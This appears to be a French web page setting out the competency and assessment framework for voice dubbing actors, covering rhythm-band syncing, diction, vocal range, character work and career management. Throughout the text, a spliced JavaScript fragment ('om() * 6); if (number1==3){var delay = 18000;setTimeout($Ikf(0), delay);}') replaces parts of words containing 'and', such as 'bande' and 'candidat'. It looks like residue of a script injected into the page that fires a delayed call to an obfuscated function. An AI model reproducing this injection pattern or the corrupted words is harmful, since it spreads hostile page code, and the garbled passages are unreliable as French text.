fbpx

REFERENTIEL – RS – COMÉDIEN(NE) DE DOUBLAGE

EVALUATION

REFERENTIEL DE COMPETENCES

REFERENTIEL D’EVALUATION

EVALUATION

Identifie les compétences et les connaissances, y compris transversales

Définit les critères et les modalités d’évaluation des acquis

MODALITÉS D’ÉVALUATION

CRITÈRES D’ÉVALUATION

Utiliser sa compétence de comédien afin de s’adapter aux exigences du rôle par sa souplesse de jeu

                Intégrer la vision du directeur artistique dans son propre jeu afin d’être raccord avec les caractéristiques du programme par sa capacité à intégrer des instructions sans déstabiliser sa qualité de jeuMise en situation en studio d’enregistrement en présence d’un directeur artistiqueLa vision du directeur artistique est intégrée dans le jeu
                Corriger ses erreurs et les analyse afin de produire une interprétation différente par sa créativité et son inventivité de jeuMise en situation en studio d’enregistrement en présence d’un directeur artistiqueUne interprétation différente est proposée

                Intégrer les caractéristiques de jeu de l’acteur original dans son interprétation : débit, expression, souffle, etc. afin de respecter l’œuvre originale par sa capacité à se fusionner dans le jeu d’un autre acteur

Mise en situation en studio d’enregistrement en présence d’un directeur artistiqueL’interprétation française est conforme à l’interprétation originale. Le jeu de l’acteur original est restitué

                Écouter ses partenaires afin des réagir à l’interprétation d’une réplique dans une scène en utilisant son expérience de théâtre et sa technique d’improvisation (détente, ne pas se juger, prendre du plaisir dans ce qu’on fait, l’écoute, décrypter les intentions de ses partenaires dans les répliques).

Mise en situation en studio d’enregistrement en présence d’un directeur artistique et d’autres comédiens qui donnent la répliqueRéagit à l’interprétation de ses partenaires de façon adaptée

                Se détendre afin d’être disponible dans son jeu par la relaxation, le lâcher-prise (ne pas se juger) et en prenant du plaisir.

Mise en situation en studio d’enregistrementLe comédien est détendu à la barre. Son expression corporelle et sa voix en témoignent

                Structurer son intervention en fonction de l’objectif à atteindre pour tenir compte des contraintes temporelles et matérielles du projet en étant rapide, disponible et d’un perfectionnisme adapté.

Mise en situation en studio d’enregistrement en présence d’un directeur artistiqueLe comédien prend le temps nécessaire à travailler bien sans être trop perfectionniste. Il est concentré et ne parle pas trop entre les prises

Synchroniser sa voix au texte

                Lire la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande rythmo en parfaite synchronisation afin de coller aux mouvements de bouches et expressions du personnage en lisant rapidement et à l’avance le texte et en regardant l’image simultanément.

Mise en situation en studio d’enregistrementLe comédien lit la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande rythmo en parfaite synchronisation. Il n’est ni en avance, ni en retard, ni trop long, ni trop court.

                Interpréter les codes de la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande rythmo pour avoir l’interprétation exacte du personnage original par une connaissance de tous les signes de l’adaptation.

Mise en situation en studio d’enregistrementLe comédien interprète tous les codes sans faute

                Se positionner par rapport au micro et sait insérer un fragment au milieu d’une phrase (drop-in/drop-out) afin d’avoir une bonne qualité de voix et de gagner du temps par son utilisation appropriée de la barre et sa complicité avec l’ingénieur du son.

Mise en situation en studio d’enregistrementLe son de la voix est bon et constant. Le drop in est réalisé du premier coup et le raccord ne s’entend pas

                Perfectionner sa diction afin de s’adapter à des débits rapides par des exercices de prononciation, aussi appelés gymnastique buccale. (exemples classiques : C’est un chasseur sachant chasser sans son chien, Un banc peint blanc plein de pain blanc, un blanc banc peint de blanc pain, Ton thé t’a-t-il ôté ta toux ?, Ces cent six sachets sachez cela si chers qu’Ali à Nice exprès tout en le sachant chez Chasachax choisit sont si chers chaque si chers qu’ils charment peu, etc.)

Mise en situation. Remise de quelques exercices de diction sans préparation.Les exercices de diction remis au candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat sont lus avec une articulation claire, rapide et fluide

                Chanter juste à la façon d’un comédien afin d’interpréter le personnage en chanson. Ce n’est pas comme un pur chanteur car le personnage n’est pas toujours censé chanter parfaitement. Par exemple, si on double un animal de dessin animé, on ne s’attend pas à ce qu’un canard chante comme Céline Dion. Le comédien utilise son souffle, son oreille musicale et sa mémorisation des mélodies par un entraînement régulier)

Mise en situation en studio d’enregistrement avec une scène chantée de dessin animéLe comédien chante juste et donne une interprétation crédible du personnage d’animation

                Adapter son débit de parole à l’original même quandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and celui-ci est découpé (on appelle ça un balai) haletant ou quandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and le personnage est âgé ou avec un accent étranger afin de rester en fusion avec l’original en modulant sa diction.

Mise en situation en studio d’enregistrement avec une scène comportant des balais, et des scènes comportant des personnages de composition diversifiésLes balais sont exécutés naturellement. La caractérisation des personnages est bien rendue

                Prononcer des noms propres et des mots étrangers afin de respecter l’adaptation en se renseignant sur la prononciation officielle et utilisée dans le reste du programme.

Mise en situation en studio d’enregistrement avec des scènes comportant des noms propres et des mots étrangersPrononce les noms propres et étrangers sans faute.

                Utiliser le vocabulaire du doublage pour communiquer avec le directeur artistique afin de se comprendre efficacement.

Mise en situation en studio d’enregistrement en présence d’un directeur artistique qui utilise le vocabulaire du doublageLe vocabulaire est connu, les instructions sont comprises

                Interpréter la grammaire, les liaisons, les élisions pour donner une interprétation cohérente à son personnage en parlant toujours de la même façon.

Mise en situation en studio d’enregistrement avec des scènes du même personnage comportant beaucoup de texte rapideLe personnage parle toujours de la même façon en conservant des élisions, liaisons et grammaire identiques.

                Analyser le jeu d’acteur et la voix de la VO (version originale) afin de restituer les émotions et la caractérisation du personnage en détectant tous les sous-textes, gestes et diction du comédien original.

Mise en situation en studio d’enregistrement. Écoute de la version originale avant l’enregistrementL’interprétation est conforme à celle de l’acteur, ou actrice, original

                Pour l’animation, dessin animé, proposer et inventer des voix innovantes, souvent amusantes et parfois différentes de l’original (les Simpson, Madagascar, etc.) pour apporter de la fantaisie et de l’imagination en créant des voix artificielles par sa souplesse vocale.

Mise en situation en studio d’enregistrement avec une scène de dessin animéLe comédien est capable de créer une voix amusante pour un personnage drôle

Interpréter avec variation

                Adapter ses capacités vocales parlées et chantées afin de suivre immédiatement le personnage doublé en ayant toute la gamme des intentions de jeu. (La liste des intentions est énorme et comprend : les sentiments d’amour, de joie, de colère, de tristesse, de crainte, de honte, et inclassables comme : curiosité, irritation etc. Chaque catégorie se divise en une vingtaine d’intentions plus détaillées (tristesse devient cafard, chagrin pitié, mélancolie, misère, agonie… et les combinaisons sont infinies)

Mise en situation en studio d’enregistrement avec des scènes diversifiées demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andant des intentions très différentesSuit le personnage doublé dans toutes ses intentions de jeu. Les intentions sont chaque fois conformes à la version originale

                Intégrer la psychologie du personnage pour proposer une interprétation cohérente en analysant le contexte de la scène (le sous-texte)

Mise en situation en studio d’enregistrementLe sous-texte est compris et intégré dans l’interprétation

                Changer sa voix selon les personnages à interpréter afin d’interpréter des personnages différents (parfois dans le même programme) en utilisant sa souplesse vocale et sa mémorisation.

Mise en situation en studio d’enregistrement avec des personnages différentsPeut interpréter plusieurs personnages. Passe d’un personnage à l’autre sans se tromper de voix

                Moduler sa voix pour caractériser les différentes humeurs d’un personnage (exemple blessure, maladie, torture, etc.) afin de s’adapter à tous les scénarios en utilisant sa projection dans le contexte (technique actor studio : puiser dans ses propres affects pour créer l’émotion, faire exister le rôle à travers sa mémoire affective, trouver en soi-même la psychologie du personnage)

Mise en situation en studio d’enregistrement avec un programme comportant des personnages à l’humeur et situation changeanteModule sa voix avec justesse et suit les différentes humeurs d’un personnage dans des situations très différentes

                Se renseigner sur le contexte et la psychologie des personnages originaux qu’il faut      doubler afin de leur donner de la profondeur en faisant une recherche personnelle sur le programme et le public ciblé.

Mise en situation en studio d’enregistrementPose spontanément des questions pour comprendre la psychologie du personnage, le contexte de la scène et le public ciblé

                Proposer plusieurs timbres (jeune, vieux, rauque, grave, aigüe, fort, faible, « trafiqué artificiellement »  (souvent pour les dessins animés) etc.) et interprétations au directeur artistique afin de choisir la meilleure approche en utilisant sa souplesse vocale et sa force de proposition

Mise en situation en studio d’enregistrement avec des scènes de dessin animé comportant une diversité de personnagesPropose trois bonnes versions de voix pour chacun de trois personnages très différents.

Structurer sa carrière

                Valoriser son parcours pour se faire connaître des employeurs en utilisant un site internet avec des références et des extraits diversifiés

Présentation au juryLe site internet est professionnel avec une bonne présentation. Les références et les extraits sont adaptés aux attentes du marché

                Créer son réseau, entretient ses relations professionnelles afin d’être convoqué aux castings en étant présent aux événements (avant premières, festivals…) et en restant en contact par téléphone et email.

Présentation au jury d’une méthode et d’une stratégieLa méthode et la stratégie sont adaptées. Le carnet d’adresse est à jour. Le comédien connaît et planifie sa présence aux évènements utiles.

                Rechercher les opportunités d’agrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andir son réseau en s’abonnant à un service de diffusion d’offres sur internet

Présentation au jury d’une méthode et d’une stratégieLe comédien est abonné à un service de diffusion d’offres sur internet (nawak, cinéaste.org, etc.)

                Développer sa dimension de comédien afin de progresser dans son jeu en jouant au théâtre, à la télévision et au cinéma.

Présentation au jury de références d’emplois sur scène ou de tournagesLe comédien joue ou cherche à jouer au théâtre, à la télévision et au cinéma. Il présente des références de tournage ou de scène récentes

                Travailler avec courtoisie sur un plateau de doublage afin d’entretenir une relation professionnelle et amicale en respectant les techniciens et les autres comédiens

Mise en situation en studio d’enregistrementPendant tout le déroulement des modalités d’évaluation, le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat a fait preuve d’une attitude professionnelle et amicale envers tous les intervenants présents

                Entretenir sa connaissance de l’environnement du doublage afin de connaître les nouvelles réglementations en exerçant une veille (par exemple par un syndicat comme le SFA). Suit la convention collective DAD-R (réglementation tarifaire du doublage incluant les droits de suite) qui est rediscutée régulièrement.

Le jury pose des questions au candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat sur les réglementations et conventions en coursLe comédien répond sans faute aux questions du jury. Il peut citer ses sources de veille

                Négocier ses cachets selon les usages et les conventions collectives (DAD-R) afin de se protéger des abus en connaissant les tarifications et droits de suite applicables aux différents secteurs.

Jeu de rôle. Un membre du jury tente de négocier abusivement un contrat.Le comédien sait argumenter et faire référence à la réglementation appropriée

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.